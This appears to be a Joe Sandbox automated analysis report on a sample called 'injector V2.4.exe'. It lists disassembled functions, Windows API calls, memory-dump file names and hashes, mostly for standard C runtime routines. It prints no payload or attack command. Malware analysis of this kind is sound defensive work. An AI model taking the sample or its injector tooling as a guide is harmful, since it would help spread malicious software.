                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004D6278
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: ^M$csm
                                                                                    • API String ID: 1170836740-306190623
                                                                                    • Opcode ID: 4308eba7da61baa27c6657838a397fca1774a7fcfc2a10b21b4e09af1ff5c974
                                                                                    • Instruction ID: 10bd6fc9a7212e39980a42d61f3ea373bfdf868ed67eeecd2c9a58adf5c45ca1
                                                                                    • Opcode Fuzzy Hash: 4308eba7da61baa27c6657838a397fca1774a7fcfc2a10b21b4e09af1ff5c974
                                                                                    • Instruction Fuzzy Hash: AA411D34A00259ABCF10EF59C8A4A9FBBB0FF05318F15819BE8159B352D739EE05CB94
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(02A64B68,02A64B68,00000000,7FFFFFFF,?,004E02F3,02A64B68,02A64B68,00000000,02A64B68,?,?,?,?,02A64B68,00000000), ref: 004E03AE
                                                                                    • __alloca_probe_16.LIBCMT ref: 004E0469
                                                                                    • __alloca_probe_16.LIBCMT ref: 004E04F8
                                                                                    • __freea.LIBCMT ref: 004E0543
                                                                                    • __freea.LIBCMT ref: 004E0549
                                                                                    • __freea.LIBCMT ref: 004E057F
                                                                                    • __freea.LIBCMT ref: 004E0585
                                                                                    • __freea.LIBCMT ref: 004E0595
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                    • String ID:
                                                                                    • API String ID: 127012223-0
                                                                                    • Opcode ID: 915c4d1d5b7014c37cab3a00e0af89b885a9906a917bf92d6340a66cf56d0616
                                                                                    • Instruction ID: 4c9bd532e94a19dc90903c1a54264c28535d37bf30992842d535b7d9bd8cf104
                                                                                    • Opcode Fuzzy Hash: 915c4d1d5b7014c37cab3a00e0af89b885a9906a917bf92d6340a66cf56d0616
                                                                                    • Instruction Fuzzy Hash: FB71F472900285ABDF21DA968C51BAF77B5DF49315F59001BE924A7381E7BCDC808B98
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,004D8831,004D5F0D,004D55A4), ref: 004D8848
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004D8856
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004D886F
                                                                                    • SetLastError.KERNEL32(00000000,004D8831,004D5F0D,004D55A4), ref: 004D88C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 55766f09aa7812fbca1da88773de9258f438401554638ddefe954284210f9390
                                                                                    • Instruction ID: 9176bceb84808072de870b62150700c947d26b1c75e4414f354dacab5f0eaa3f
                                                                                    • Opcode Fuzzy Hash: 55766f09aa7812fbca1da88773de9258f438401554638ddefe954284210f9390
                                                                                    • Instruction Fuzzy Hash: 9801B5325192125DEA243B767CE693B2754EB517B8360033FF411493E2EF199C01728D
                                                                                    Strings
                                                                                    • C:\Users\user\Desktop\injector V2.4.exe, xrefs: 004DCB70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C:\Users\user\Desktop\injector V2.4.exe
                                                                                    • API String ID: 0-660097568
                                                                                    • Opcode ID: 274fb16de349362950db64e64a0391cbfd136562f66aa6c2c69a9c76d31bb279
                                                                                    • Instruction ID: b9c7a278b8b291ceb0341fb9292a9a005e5bd470fe7d4d9f8698a9b6c4ce63d0
                                                                                    • Opcode Fuzzy Hash: 274fb16de349362950db64e64a0391cbfd136562f66aa6c2c69a9c76d31bb279
                                                                                    • Instruction Fuzzy Hash: C221C271204206AFCB20AF66ECE1D2B77A9EF443A8710452BFA1997351DB38EC40D798
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D6656D70,?,?,00000000,004E25EB,000000FF,?,004D7015,00000002,?,004D70B1,004D83A0), ref: 004D6F89
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004D6F9B
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,004E25EB,000000FF,?,004D7015,00000002,?,004D70B1,004D83A0), ref: 004D6FBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: 8d2f6318bf9beaaf834a02cfa12e6da906b89cc11e7c4e01927bcbd9feb7418a
                                                                                    • Instruction ID: 4a01f7c523013e165e98b9df6da663835d7e6ffc091c66b915d5d144e15672f0
                                                                                    • Opcode Fuzzy Hash: 8d2f6318bf9beaaf834a02cfa12e6da906b89cc11e7c4e01927bcbd9feb7418a
                                                                                    • Instruction Fuzzy Hash: 2C01A2319086A9ABCB018F55DC49FEEB7B8FB04B15F05052AE811A63D0DBB89900CA98
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 004DDFA2
                                                                                    • __alloca_probe_16.LIBCMT ref: 004DE06B
                                                                                    • __freea.LIBCMT ref: 004DE0D2
                                                                                      • Part of subcall function 004DBC45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004D41E0,?,?,004D1007,?,004CFAB5), ref: 004DBC77
                                                                                    • __freea.LIBCMT ref: 004DE0E5
                                                                                    • __freea.LIBCMT ref: 004DE0F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1423051803-0
                                                                                    • Opcode ID: fede7ebb4ee31872e5f714ade9b98efe7f7f446ce982246ac72af7851c51b3e3
                                                                                    • Instruction ID: 321caedbbc9571ece6527a998a3fb259eea789f67700acce592e7c6f655bd0c5
                                                                                    • Opcode Fuzzy Hash: fede7ebb4ee31872e5f714ade9b98efe7f7f446ce982246ac72af7851c51b3e3
                                                                                    • Instruction Fuzzy Hash: ED51B472600216AFDB226F63CC65EBB76A9EF44B14B15402FFD05DA301EB79DC50C6A8
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,004D93FE,?,?,00000000,00000000,00000000,?), ref: 004D951D
                                                                                    • CatchIt.LIBVCRUNTIME ref: 004D9603
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CatchEncodePointer
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 1435073870-2084237596
                                                                                    • Opcode ID: 40ebef99bfe677df6f0c6592b9bbc5498267d295eb47b0282b898a4a9fedea96
                                                                                    • Instruction ID: 52d48338e1b31320b0ecf6a1f129548d9c42b0c4fc67e9957cbf98f3f1063602
                                                                                    • Opcode Fuzzy Hash: 40ebef99bfe677df6f0c6592b9bbc5498267d295eb47b0282b898a4a9fedea96
                                                                                    • Instruction Fuzzy Hash: F3414972900209AFCF16DF94D991AAE7BB5EF48304F18406BF905AA311D739DD50DB58
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,004DDCFA,00000000,?,004ECCD0,?,?,?,004DDC31,00000004,InitializeCriticalSectionEx,004E46F8,004E4700), ref: 004DDC6B
                                                                                    • GetLastError.KERNEL32(?,004DDCFA,00000000,?,004ECCD0,?,?,?,004DDC31,00000004,InitializeCriticalSectionEx,004E46F8,004E4700,00000000,?,004D971C), ref: 004DDC75
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 004DDC9D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3177248105-2084034818
                                                                                    • Opcode ID: a3736c332924439d333baa1c2a4a3637210af519623b6b899411df2deeb86aaf
                                                                                    • Instruction ID: 44374c02eb2bd29e932f499b1306acda0c543dee709844be0b252aa86680e9dd
                                                                                    • Opcode Fuzzy Hash: a3736c332924439d333baa1c2a4a3637210af519623b6b899411df2deeb86aaf
                                                                                    • Instruction Fuzzy Hash: 63E01230654249BAEF112B51DC46B593B55AB01F55F104036F94DA82E1EBA69C11C54C
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(D6656D70,00000000,00000000,?), ref: 004DE64B
                                                                                      • Part of subcall function 004DD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,004D87B1,?,00000000,?), ref: 004DD192
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004DE89D
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004DE8E3
                                                                                    • GetLastError.KERNEL32 ref: 004DE986
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    • Opcode ID: 5929e643d14611bf21021755f0fbd7329fc7ae8f465fbc0d2ebc9009bee511d8
                                                                                    • Instruction ID: c0fc32153d04e952500d94daaf9fd14b469e837201900f022c88e547fcf47ad4
                                                                                    • Opcode Fuzzy Hash: 5929e643d14611bf21021755f0fbd7329fc7ae8f465fbc0d2ebc9009bee511d8
                                                                                    • Instruction Fuzzy Hash: 2ED188B5D002489FCF15DFA9C8E09AEBBB5FF09314F28416BE456EB352D634A902CB54
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID:
                                                                                    • API String ID: 1740715915-0
                                                                                    • Opcode ID: 81e80ffb6d089c7d17f9a712048a567bd30421c01c8824b906bb161a23fabaa4
                                                                                    • Instruction ID: f2182e0fdb1ea66df77aa6764f5fef37c4c0dcb4affb400f0c057a754e6f3e69
                                                                                    • Opcode Fuzzy Hash: 81e80ffb6d089c7d17f9a712048a567bd30421c01c8824b906bb161a23fabaa4
                                                                                    • Instruction Fuzzy Hash: E6510372605602AFEB2A9F15E861BBA73A5FF04304F14052FE9458B391EB39EC41C798
                                                                                    APIs
                                                                                      • Part of subcall function 004DD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,004D87B1,?,00000000,?), ref: 004DD192
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,004DC95E,?,?,?,00000000), ref: 004DC61C
                                                                                    • __dosmaperr.LIBCMT ref: 004DC623
                                                                                    • GetLastError.KERNEL32(00000000,004DC95E,?,?,00000000,?,?,?,00000000,00000000,?,004DC95E,?,?,?,00000000), ref: 004DC65D
                                                                                    • __dosmaperr.LIBCMT ref: 004DC664
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1913693674-0
                                                                                    • Opcode ID: a4ba477a4bba0d7b566383c125edd27b2a3687074b3ba8efee33601d59b38c51
                                                                                    • Instruction ID: 10723746cc27902094d629199e538dfa06f925b243e56a479bffae48e3b31f01
                                                                                    • Opcode Fuzzy Hash: a4ba477a4bba0d7b566383c125edd27b2a3687074b3ba8efee33601d59b38c51
                                                                                    • Instruction Fuzzy Hash: 3321B371604217AF9B10AF6688E092BB7A9EF45368710852BF81597791D738EC01CB98
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 004DD235
                                                                                      • Part of subcall function 004DD131: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,004D87B1,?,00000000,?), ref: 004DD192
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004DD26D
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004DD28D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 158306478-0
                                                                                    • Opcode ID: 1dfe58774276b000e95ac7707981ade382240aabf299e8a8be3198dbb62c1689
                                                                                    • Instruction ID: 61b041babefe601e144f0ea0e09e43e95c31edff789ccade7210638004d5d1cc
                                                                                    • Opcode Fuzzy Hash: 1dfe58774276b000e95ac7707981ade382240aabf299e8a8be3198dbb62c1689
                                                                                    • Instruction Fuzzy Hash: C511D6B5D05519BE6B2227765CD9CBF6A6CDF853A8711006BF801D6342FB68CD0241BE
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,004DFF31,00000000,00000001,00000000,?,?,004DE9DA,?,00000000,00000000), ref: 004E07D7
                                                                                    • GetLastError.KERNEL32(?,004DFF31,00000000,00000001,00000000,?,?,004DE9DA,?,00000000,00000000,?,?,?,004DE320,00000000), ref: 004E07E3
                                                                                      • Part of subcall function 004E0840: CloseHandle.KERNEL32(FFFFFFFE,004E07F3,?,004DFF31,00000000,00000001,00000000,?,?,004DE9DA,?,00000000,00000000,?,?), ref: 004E0850
                                                                                    • ___initconout.LIBCMT ref: 004E07F3
                                                                                      • Part of subcall function 004E0815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004E07B1,004DFF1E,?,?,004DE9DA,?,00000000,00000000,?), ref: 004E0828
                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,004DFF31,00000000,00000001,00000000,?,?,004DE9DA,?,00000000,00000000,?), ref: 004E0808
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: b8427d747a4efb9374761fd23dc4c576d523842c2f535db1870ca4eeca483c51
                                                                                    • Instruction ID: 0a8e1e3b430a89d1aa140256ec1864ae54e7b0490f617585b21c6de9b4d153c8
                                                                                    • Opcode Fuzzy Hash: b8427d747a4efb9374761fd23dc4c576d523842c2f535db1870ca4eeca483c51
                                                                                    • Instruction Fuzzy Hash: 57F01236000199BBCF222FD6DC44D9A3F27FF04362F048522FA1889162C6728C60DBD8
                                                                                    APIs
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 004D8D75
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___except_validate_context_record
                                                                                    • String ID: csm$csm
                                                                                    • API String ID: 3493665558-3733052814
                                                                                    • Opcode ID: fb2ed8a83059507ac120473e9f098b4cc484e03a170de68f0b1c3195545374a9
                                                                                    • Instruction ID: cc7bb379e472f72b95c0434cf05db5a65aea231faf320e1337c36e0f4711d214
                                                                                    • Opcode Fuzzy Hash: fb2ed8a83059507ac120473e9f098b4cc484e03a170de68f0b1c3195545374a9
                                                                                    • Instruction Fuzzy Hash: 6F31EF72400254EFCF229F51C8208BB7B26FB08318B084A5FF84489361CB3ADD61DF89
                                                                                    APIs
                                                                                      • Part of subcall function 004D4533: __EH_prolog3_GS.LIBCMT ref: 004D453A
                                                                                    • std::domain_error::domain_error.LIBCPMT ref: 004D45EC
                                                                                      • Part of subcall function 004D43A4: std::exception::exception.LIBCONCRT ref: 004D43BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
